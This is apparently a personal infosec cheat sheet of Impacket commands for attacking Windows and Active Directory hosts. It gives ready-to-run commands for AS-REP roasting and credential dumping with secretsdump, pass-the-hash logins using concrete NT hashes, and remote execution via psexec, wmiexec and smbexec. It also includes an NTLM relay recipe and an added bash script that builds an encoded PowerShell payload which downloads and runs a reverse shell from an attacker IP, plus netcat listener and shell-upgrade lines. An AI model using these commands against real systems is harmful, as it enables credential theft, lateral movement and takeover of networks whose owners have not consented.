akde/infosec

Information security is ultimately about managing risk


See the Impacket site for a short description of all tools.

Tip: On Kali, the tools are packaged as impacket-<name> (e.g. impacket-psexec) where this page writes <name>.py.

Enumeration without authentication

Determine the system architecture (32- or 64-bit) over MSRPC; no credentials needed:

getArch.py -target $target

List the RPC interface IDs the endpoint mapper (port 135) exposes:

ifmap.py $target 135
rpcdump.py $target

Enumeration with half authentication

Scenario: you have credentials for one AD user (here peter). Use them to find every user for which Kerberos preauthentication is disabled and to request an AS-REP for each. From Kali:

impacket-GetNPUsers -dc-ip $ip -request dom.ain/peter

If this returns $krb5asrep$23$... hashes, crack them offline with hashcat mode 18200 (Kerberos 5 AS-REP etype 23).

Enumeration with authentication

Find (other) users

lookupsid.py dom/user:pass@$target
samrdump.py dom/user:pass@$target

Get as many credentials as possible (SAM, LSA secrets and cached logons; NTDS.dit contents when run against a DC)

secretsdump.py dom/user:pass@$target

Get AD users

GetADUsers.py -dc-ip $target dom/user:pass

Check whether a set of credentials (password or NT hash) is accepted by the RDP service (rdp_check.py authenticates via CredSSP without opening a session)

rdp_check.py dom/user:pass@$target
rdp_check.py -hashes b40c7060e1bf68227131564a1bf33d48:b40c7060e1bf68227131564a1bf33d48 svcorp.com/nicky@$target

List services (services.py also supports start, stop, create, delete, status and config; see help)

services.py dom/user:pass@$target list

Code exe­cu­tion

atexec.py dom/user:pass@$target systeminfo
psexec.py dom/user:pass@$target systeminfo
impacket-psexec -hashes 00000000000000000000000000000000:7a38310ea6f0027ee955abed1762964b Administrator@$target

Shells similar to WinRM but over different endpoints (DCOM, SMB/service control, WMI); they can work when WinRM is not enabled. All of them need local administrator rights on the target.

dcomexec.py dom/user:pass@$target dir
smbexec.py dom/user:pass@$target
wmiexec.py dom/user:pass@$target

(See pth-winexe here as well!)

Tracking sessions. This script stays open and reports when sessions are created or closed:

netview.py dom/user:pass -target $target

Browsing an SMB share (the third line uses Samba's smbclient, not Impacket; note the double quotes so $target and $HASH expand):

smbclient.py dom/user:pass@$target
smbclient.py -hashes aad3b435b51404eeaad3b435b51404ee:6b0e72ee64ea42ca092bd1a7449fa46e Administrator@10.11.1.223
smbclient "//$target/share" -U "user%$HASH" --pw-nt-hash

Reading and manipulating the registry

reg.py dom/user:pass@$target query -keyName HKLM\\Software\\

Relaying NTLMv2 authentication

If you control a user, or can make one authenticate to you, and want to use that user's NTLM authentication against another system:

  1. Set up ntlmrelayx on your own system with a command to execute on the relay target:
    impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.50.212 -c "powershell -enc JABjA…"
    The -enc value is the base64 of the UTF-16LE encoding of the PowerShell code (what powershell.exe -EncodedCommand expects), e.g. a reverse shell.
  2. Start the listener that the -enc payload connects back to.
  3. Trigger the authentication from the victim via SMB, e.g.
    • in the Windows Explorer,
    • via the command line: dir \\$ownSystem\nonexistingShare or
    • via PowerShell: Get-ChildItem \\$ownSystem\nonexistingShare
  The relay only succeeds if the target (192.168.50.212 here) does not require SMB signing, and the -c command only runs if the relayed user is a local administrator on that target.

See https://www.secureauth.com/blog/playing-relayed-credentials for ntlmrelayx.py.
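The three steps above as one worked example. This is an added example, not code from the original page or from the Impacket project: a small bash helper that produces the UTF-16LE base64 string that "powershell -enc" expects (a plain base64 of UTF-8 text is silently wrong), decodes it back for checking, and assembles the ntlmrelayx command line from it. The relay target 192.168.50.212 is the page's; the attacker IP 192.168.50.10, the stager URL and the listener port are assumptions.

```shell
#!/usr/bin/env bash
# Added example (not from the page or Impacket): build the -enc argument that
# ntlmrelayx hands to "powershell -enc", and assemble the step-1 command line.
# powershell.exe -EncodedCommand wants base64 of UTF-16LE text, not of UTF-8.
set -euo pipefail

# Encode a PowerShell command for -enc. printf '%s' avoids a trailing newline.
enc_ps() {
    printf '%s' "$1" | iconv -f UTF-8 -t UTF-16LE | base64 -w0
}

# Decode an -enc value back to text, to verify what the target would execute.
dec_ps() {
    printf '%s' "$1" | base64 -d | iconv -f UTF-16LE -t UTF-8
}

# Assemble the ntlmrelayx command of step 1 for a relay target and a payload.
relay_cmd() {
    local target="$1" payload="$2"
    printf 'impacket-ntlmrelayx --no-http-server -smb2support -t %s -c "powershell -enc %s"\n' \
        "$target" "$(enc_ps "$payload")"
}

# Assumed values for the example; only TARGET comes from the page.
ATTACKER="192.168.50.10"
TARGET="192.168.50.212"
PAYLOAD="IEX (New-Object Net.WebClient).DownloadString('http://$ATTACKER/rev.ps1')"

echo "# step 1 (on Kali):"
relay_cmd "$TARGET" "$PAYLOAD"
echo "# step 2: serve rev.ps1 over HTTP and start the listener it calls back to, e.g. nc -lvnp 4444"
echo "# step 3 (as the victim user, on the victim host): dir \\\\$ATTACKER\\nonexistingShare"
```

Run it and paste the printed step-1 line into a root shell; dec_ps on the -enc value is a quick sanity check before relaying, since a mis-encoded payload costs you the one authentication you captured.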

About

Personal collection of some infosec stuff. Primary purpose of this site is to collect and organize for myself.

Note: Some content is not publicly visible due to copyright issues. Therefore, some links could be broken.

Upgrade a dumb shell to a TTY

python -c 'import pty;pty.spawn("/bin/bash")'

python3 -c 'import pty;pty.spawn("/bin/bash")'